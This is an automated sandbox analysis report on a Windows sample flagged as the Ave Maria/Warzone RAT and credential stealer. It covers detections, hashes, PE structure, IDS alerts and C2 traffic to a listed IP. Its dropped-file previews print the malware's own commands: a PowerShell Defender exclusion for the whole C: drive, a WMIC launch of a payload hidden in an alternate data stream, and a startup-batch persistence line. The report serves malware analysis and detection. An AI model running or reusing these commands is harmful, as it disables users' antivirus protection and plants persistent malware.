            windowupdate.exe signatures: Multi AV Scanner detection for dropped file; Detected unpacking (creates a PE file in dynamic memory); Writes to foreign memory regions; 4 other signatures
            windowupdate.exe started: cmd.exe (which started conhost.exe); powershell.exe (which started conhost.exe)
            Top-level cmd.exe started: WMIC.exe (signature: Creates processes via WMI); conhost.exe

            Source | Detection | Scanner | Label
            SecuriteInfo.com.Variant.Jaik.73085.20962.exe | 17% | ReversingLabs | Win32.Trojan.Jaik

            Source | Detection | Scanner | Label
            C:\ProgramData:ApplicationData | 17% | ReversingLabs | Win32.Trojan.Jaik
            C:\ProgramData\windowupdate.exe | 17% | ReversingLabs | Win32.Trojan.Jaik

            Source | Detection | Scanner | Label
            3.3.windowupdate.exe.10928d8.10.unpack | 100% | Avira | TR/Patched.Ren.Gen3
            3.3.windowupdate.exe.10928d8.12.unpack | 100% | Avira | TR/Patched.Ren.Gen3
            3.2.windowupdate.exe.38d0000.3.unpack | 100% | Avira | TR/Redcap.ghjpt
            0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack | 100% | Avira | TR/Redcap.ghjpt
            3.3.windowupdate.exe.10928d8.4.unpack | 100% | Avira | TR/Patched.Ren.Gen3
            3.2.windowupdate.exe.2ed053f.1.unpack | 100% | Avira | TR/Patched.Ren.Gen3
            0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack | 100% | Avira | TR/Patched.Ren.Gen3
            3.3.windowupdate.exe.10928d8.5.unpack | 100% | Avira | TR/Patched.Ren.Gen3

            No Antivirus matches

            Source | Detection | Scanner | Label
            104.128.191.44 | 0% | Avira URL Cloud | safe
            http://crl.m | 0% | URL Reputation | safe
            https://ion=v4.5n | 0% | Avira URL Cloud | safe
            No contacted domains info
| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| 104.128.191.44 | true | Avira URL Cloud: safe | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| http://crl.m | powershell.exe, 0000000D.00000003.411093654.000000000917F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://ion=v4.5n | powershell.exe, 00000001.00000003.382885100.0000000007B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.385315234.0000000007BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.383555084.0000000007BAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| https://github.com/syohex/java-simple-mine-sweeperC: | SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.389408114.00000000045EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412976315.0000000004783000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.388775306.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412820303.0000000004641000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.389408114.00000000045EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412976315.0000000004783000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 104.128.191.44 | unknown | Reserved | 26827 | EPBTELECOMUS | true |
                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:626897
                    Start date and time: 2022-05-15 21:36:22 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:SecuriteInfo.com.Variant.Jaik.73085.20962.11149 (renamed file extension from 11149 to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.phis.troj.spyw.expl.evad.winEXE@17/14@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 84.4% (good quality ratio 83%)
                    • Quality average: 83.8%
                    • Quality standard deviation: 20.4%
                    HCA Information:
                    • Successful, ratio: 79%
                    • Number of executed functions: 62
                    • Number of non-executed functions: 333
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                    • Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
| Time | Type | Description |
| --- | --- | --- |
| 21:37:41 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat |
| 21:37:52 | API Interceptor | 1x Sleep call for process: WMIC.exe modified |
| 21:37:58 | API Interceptor | 806x Sleep call for process: cmd.exe modified |
| 21:38:01 | API Interceptor | 47x Sleep call for process: powershell.exe modified |
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:modified
                    Size (bytes):2054656
                    Entropy (8bit):4.278811521243932
                    Encrypted:false
                    SSDEEP:12288:ed05fRBi1vvXHdJUNoyiiguuJ2glmnGeNCrRcQc/PJcEj2uGn9bunQ7JiD4pa7+o:q1vfHUorlm9NCFcR/PJc4gbunQ
                    MD5:35ED3FE203FABDE1B0D353815F9A273B
                    SHA1:6A5E219FD96905B154295697AC6F72A13725F6A1
                    SHA-256:8D4020BEA8924365724FF2C7EAFFA0541F0AC4712C6B0A4723C5F68858FA306C
                    SHA-512:9657C11D07068F9E054BC701A0789E3918E4554F845B6CF6371299CE477FB17CEF6F4AB97469BECB5892BB66091435E1BFB187299A8D6722564813EC767B4CBB
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 17%
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2054656
                    Entropy (8bit):4.278811521243932
                    Encrypted:false
                    SSDEEP:12288:ed05fRBi1vvXHdJUNoyiiguuJ2glmnGeNCrRcQc/PJcEj2uGn9bunQ7JiD4pa7+o:q1vfHUorlm9NCFcR/PJc4gbunQ
                    MD5:35ED3FE203FABDE1B0D353815F9A273B
                    SHA1:6A5E219FD96905B154295697AC6F72A13725F6A1
                    SHA-256:8D4020BEA8924365724FF2C7EAFFA0541F0AC4712C6B0A4723C5F68858FA306C
                    SHA-512:9657C11D07068F9E054BC701A0789E3918E4554F845B6CF6371299CE477FB17CEF6F4AB97469BECB5892BB66091435E1BFB187299A8D6722564813EC767B4CBB
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 17%
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14734
                    Entropy (8bit):4.993014478972177
                    Encrypted:false
                    SSDEEP:384:wZvOdB8Ypib4JNXp59HopbjvwRjdvRlAYotiQ0HzAF8:UvOdB8YNNZjHopbjoRjdvRlAYotinHzr
                    MD5:C5A56B913DEEDCF5AE01A2D4F8AA69CE
                    SHA1:C91D19BFD666FDD02B0739893833D4E1C0316511
                    SHA-256:1C5C865E5A98F33E277A81FCDADFBAB1367176BA14F8590022F7E5880161C00D
                    SHA-512:1058802FCD54817359F84977DD26AD4399C572910E67114F70B024EBADDF4E35E6AFF6461F90356205228B4B860E69392ABC27D38E284176C699916039CFA5ED
                    Malicious:false
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):21540
                    Entropy (8bit):5.601157753176713
                    Encrypted:false
                    SSDEEP:384:wtL6/0UWqENJ82XRYSBKnWZispE93C1u16zq5mHKHyQ3DrjaIvUI++j/:SHH8v4KWlwC3qUZGX2ly
                    MD5:29B2B467A2C4A48C8645FF0AA566BEB2
                    SHA1:C043EEA8A352A9A4A80B27AFF10B94017E98258C
                    SHA-256:192DEC31FD6C2C952502D10D265BA639BA30A3F18172A734D18E807BE65A318A
                    SHA-512:A83E902CBD5D128E75F4E45085F9DA6B80D6442529628CA2F59DAAA69C33A63AA661D9B9D22A3215E2FC9B6B3B23B34A83402DB71FFCF93964BCC4572B6DDE47
                    Malicious:false
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):140
                    Entropy (8bit):4.86129651314522
                    Encrypted:false
                    SSDEEP:3:QwZ2vOUrKaM6eNGRjDWXp5cViEaKC5SufyM1K/RFofD6tRQLRWLyLRHgn:QElPhxuWXp+NaZ5SuH1MUmt2FWLyS
                    MD5:C2E52EDB9BA6919C7D9F3CF0B88221E2
                    SHA1:9972112AF86B48E937E589E262D21BAD251A6010
                    SHA-256:FAE189421B6E7CC977F1D2A69D712C97B22E810B0AE3F2F4E258E1112694C560
                    SHA-512:FDDEDA3E5D597D086B9C4412621078B3D14B6624DF2B003CA3238E3BD03DE35AAF3E16F04339AC54B04A723F98E76F17D74263F7D1CCBCA92B6FD2C325014B3B
                    Malicious:true
                    Preview:for /F "usebackq tokens=*" %%A in ("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start") do %%A
                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):59
                    Entropy (8bit):4.2659637614761765
                    Encrypted:false
                    SSDEEP:3:eGAjGJwbZkREfcjMGERMQhM:ZuGJwi8cwGj
                    MD5:579E29CEC6BDE04C5C074D8311D6B884
                    SHA1:2FDFD4C6B8EB43A4C6F4C0D3998E4A5364221DFF
                    SHA-256:65138897F467ADF9FE20594326D724D2CD5B437D9AACF5F83721AF340F70CE3C
                    SHA-512:4011A9FD58C1DC8AA3ED79589D7232BBD06EB3FB32513D3C5B59B740ED89FDC9CCC9F3291812AFFF2CD679820BCD940AE3A49E41EBCBE20413821ACAD7C5191D
                    Malicious:true
                    Preview:wmic process call create '"C:\ProgramData:ApplicationData"'
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):5045
                    Entropy (8bit):5.388024296986314
                    Encrypted:false
                    SSDEEP:96:BZmhQN5QqDo1ZBZFhQN5QqDo1ZqM6UjZVhQN5QqDo1ZwFEEqZN:9FTM
                    MD5:3E07E8924F7C65A903A2367B78CDBF93
                    SHA1:3DC700FAE2312E5FE2DA6F97838BF44E2EB7331F
                    SHA-256:459AC2BFD4CEA72230ACD72E11C941AA174D7820420FEE8C132DF10E4316392F
                    SHA-512:2FF33B7E0CECD2FBD94B5F0EB6882CD8A323E253F6DA74F83034889DBAAB07BA22E7B8FAD73804807619DB6C42A34CBC829A4759697973364DA3843952B245C1
                    Malicious:false
                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220515213818..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 316..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220515213818..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220515214218..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclusi
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):5048
                    Entropy (8bit):5.388063371930918
                    Encrypted:false
                    SSDEEP:96:BZePhQN5sqDo1ZIwZ6hQN5sqDo1ZQM6UjZnhQN5sqDo1ZTFEEjZl:iSdKPq
                    MD5:A7C69A3C25CAFBE9F023AFF815477553
                    SHA1:27F02E22876CA925486635A175E81C7B7593A9F4
                    SHA-256:0079DBBC9539A71EB85FE5F33FE64A8F6E0EB2B07ED1C73E060CF0FC9FCFE19B
                    SHA-512:37523698E4897E3B3F70DD8541E21953C953AAA8DFED9BBF4C1F47C7188F42810DBB26880B3740A5281631F06B346B7A59553DF83533A9A8D781C906362DC3F0
                    Malicious:false
                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220515213757..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 5900..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220515213757..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220515214020..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus
                    Process:C:\Windows\System32\wbem\WMIC.exe
                    File Type:ASCII text, with CRLF, CR line terminators
                    Category:dropped
                    Size (bytes):140
                    Entropy (8bit):5.001523394375711
                    Encrypted:false
                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys36JQAimXv:Yw7gJGWMXJXKSOdYiygKkXe/qeAiY
                    MD5:DA5950D62F7968DA1F66E3811A9061F9
                    SHA1:69B83F624AA9EC9EA09BE0E165499B436101F9EA
                    SHA-256:C09AF5F39B8BF613C007465A63F70E84766710CEE7FEB62780433C9D8C248AD7
                    SHA-512:6291C46BC66AEC7AEB973EE076146AF54C800A63F3F6F9C0EF01DA6535539E2F44FBF0BACBEAF66C4D34C4BE122AD728F62681E408FA710127120806D952DC9E
                    Malicious:false
                    Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ReturnValue = 9;..};....
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):4.278811521243932
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    File size:2054656
                    MD5:35ed3fe203fabde1b0d353815f9a273b
                    SHA1:6a5e219fd96905b154295697ac6f72a13725f6a1
                    SHA256:8d4020bea8924365724ff2c7eaffa0541f0ac4712c6b0a4723c5f68858fa306c
                    SHA512:9657c11d07068f9e054bc701a0789e3918e4554f845b6cf6371299ce477fb17cef6f4ab97469becb5892bb66091435e1bfb187299a8d6722564813ec767b4cbb
                    SSDEEP:12288:ed05fRBi1vvXHdJUNoyiiguuJ2glmnGeNCrRcQc/PJcEj2uGn9bunQ7JiD4pa7+o:q1vfHUorlm9NCFcR/PJc4gbunQ
                    TLSH:47951910B3A15124F5F767FA66B54694887E3C811F2CE2CF4A850ADECA292F47C347A7
                    Icon Hash:00828e8e8686b000
                    Entrypoint:0x4187d0
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x627C3FE2 [Wed May 11 22:59:46 2022 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:f40b392a15f243aae9f6b24f04047e6e
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc4780 | 0xa0 | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1f4000 | 0x1040 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1f6000 | 0x60c4 | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc1398 | 0x54 | .rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0xc1480 | 0x18 | .rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc12d8 | 0x40 | .rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x96000 | 0x2b0 | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x94800 | 0x94800 | False | 0.348802149095 | data | 6.1898202899 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata | 0x96000 | 0x2f5f0 | 0x2f600 | False | 0.203645489776 | data | 4.42534631821 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0xc6000 | 0x12d7e0 | 0x12a400 | False | 0.134401358183 | data | 2.31170755301 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .rsrc | 0x1f4000 | 0x1040 | 0x1200 | False | 0.351345486111 | data | 3.69129058144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc | 0x1f6000 | 0x60c4 | 0x6200 | False | 0.742665816327 | data | 6.70176669915 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country
                    TYPELIB | 0x1f4190 | 0x834 | data | English | United States
                    RT_DIALOG | 0x1f4ce0 | 0x1ae | data | English | United States
                    RT_STRING | 0x1f4e90 | 0x2e | data | English | United States
                    RT_VERSION | 0x1f49c8 | 0x314 | data | English | United States
                    RT_MANIFEST | 0x1f4ec0 | 0x17d | XML 1.0 document text | English | United States
                    DLL | Import
                    KERNEL32.dll | GetModuleHandleA, HeapSize, GetCommandLineA, MultiByteToWideChar, Sleep, GetLastError, SetEvent, LockResource, HeapReAlloc, RaiseException, FindResourceExW, IsDBCSLeadByte, LoadResource, FindResourceW, HeapAlloc, DecodePointer, HeapDestroy, GetProcAddress, DeleteCriticalSection, GetProcessHeap, GetModuleHandleW, WideCharToMultiByte, lstrcmpiA, TlsFree, CreateFileW, ReadConsoleW, GetCurrentThreadId, FlushFileBuffers, GetConsoleMode, GetConsoleCP, SetFilePointerEx, GetFileSizeEx, GetStringTypeW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, HeapQueryInformation, SetConsoleCtrlHandler, WriteConsoleW, GetFileType, GetCurrentThread, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, InitializeCriticalSectionEx, GetModuleFileNameA, LeaveCriticalSection, VirtualAlloc, EnterCriticalSection, SetLastError, HeapFree, VirtualProtect, SizeofResource, ReadFile, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, WriteFile, GetStdHandle, ExitProcess, HeapValidate, GetModuleHandleExW, GetModuleFileNameW, VirtualQuery, GetSystemInfo, TlsSetValue, TlsGetValue, TlsAlloc, InterlockedFlushSList, RtlUnwind, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetStartupInfoW, TerminateProcess, SetUnhandledExceptionFilter, LoadLibraryExW, EncodePointer, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, GetCurrentProcess, FlushInstructionCache, IsProcessorFeaturePresent, VirtualFree, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, CloseHandle, InitializeCriticalSectionAndSpinCount, ResetEvent, WaitForSingleObjectEx, CreateEventW, UnhandledExceptionFilter, FreeLibrary
                    USER32.dll | CharUpperA, CreateDialogParamA, CharNextW, UnregisterClassA, SetWindowLongA, PostThreadMessageA, IsWindow, ShowWindow, MessageBoxA, GetClientRect, DestroyWindow, GetWindow, GetWindowRect, GetDC, SetWindowPos, MonitorFromWindow, MapWindowPoints, GetWindowLongA, DispatchMessageA, GetMonitorInfoA, GetParent, ReleaseDC, IsWindowVisible, SendMessageA, GetDlgItem, EnableWindow, CharNextA, GetMessageA
                    GDI32.dll | GetTextExtentPoint32A
                    ADVAPI32.dll | RegCloseKey, RegDeleteKeyA, RegCreateKeyExA, RegEnumKeyExA, RegQueryInfoKeyA, RegOpenKeyExA, RegSetValueExA
                    SHELL32.dll | SHGetFileInfoA
                    ole32.dll | StringFromGUID2, CoAddRefServerProcess, CoReleaseServerProcess, StringFromCLSID, CoInitialize, CoRevokeClassObject, CoUninitialize, CoCreateInstance, CoTaskMemFree, CoRegisterClassObject
                    OLEAUT32.dll | SysAllocStringLen, UnRegisterTypeLib, LoadRegTypeLib, LoadTypeLib, VariantInit, RegisterTypeLib, SysAllocString, SysStringLen, VarUI4FromStr, SysFreeString, SetErrorInfo, CreateErrorInfo
                    Description | Data
                    LegalCopyright | Microsoft Corporation. All rights reserved.
                    InternalName | ATLDUCK
                    FileVersion | 1, 0, 0, 1
                    CompanyName |
                    ProductName | atlduck Module
                    OLESelfRegister |
                    ProductVersion | 1, 0, 0, 1
                    FileDescription | atlduck Module
                    OriginalFilename | ATLDUCK.DLL
                    Translation | 0x0409 0x04b0
                    Language of compilation system | Country where language is spoken | Map
                    English | United States |
                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    05/15/22-21:37:58.748904 | TCP | 2841903 | ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    05/15/22-21:37:58.879218 | TCP | 2834979 | ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    May 15, 2022 21:37:58.681555033 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:37:58.714667082 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:37:58.715264082 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:37:58.748903990 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:37:58.874927044 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:37:58.879218102 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:37:58.966294050 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:37:58.966352940 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:37:59.051170111 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:38:18.746695042 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:38:18.750108957 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:38:18.846959114 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:38:38.766438961 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:38:38.767307997 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:38:38.844547033 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:38:58.778517962 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:38:58.779375076 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:38:58.856599092 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:39:18.791378021 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:39:18.796629906 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:39:18.874511957 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:39:38.810094118 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3
                    May 15, 2022 21:39:38.810285091 CEST | 49694 | 8080 | 192.168.2.3 | 104.128.191.44
                    May 15, 2022 21:39:38.894669056 CEST | 8080 | 49694 | 104.128.191.44 | 192.168.2.3

                    Target ID:0
                    Start time:21:37:28
                    Start date:15/05/2022
                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe"
                    Imagebase:0x940000
                    File size:2054656 bytes
                    MD5 hash:35ED3FE203FABDE1B0D353815F9A273B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
